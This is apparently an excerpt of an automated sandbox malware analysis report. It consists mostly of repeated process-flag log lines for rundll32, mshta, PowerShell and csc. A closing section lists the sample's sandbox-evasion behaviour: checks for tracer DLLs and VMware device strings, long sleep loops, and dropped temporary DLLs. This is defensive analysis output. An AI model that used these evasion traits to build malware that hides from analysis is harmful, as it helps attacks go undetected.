Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

barindex
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: RuntimeBroker.exe, 0000002E.00000000.995808507.000001B4F862A000.00000004.00000001.sdmp Binary or memory string: C:\WINDOWS\SYSTEM32\MSTRACER.DLLCR
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6452 Thread sleep time: -10145709240540247s >= -30000s
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6080 Thread sleep time: -6456360425798339s >= -30000s
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4875
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4340
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4102
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4861
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\aixojixg\aixojixg.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\a52acufz\a52acufz.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\ddwuzigh\ddwuzigh.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\keehvxm3\keehvxm3.dll Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0457A5F6 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 0_2_0457A5F6
Source: explorer.exe, 0000001C.00000000.916169591.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: RuntimeBroker.exe, 00000030.00000000.1053923810.000001DA49E59000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000001C.00000000.916169591.000000000A60E000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
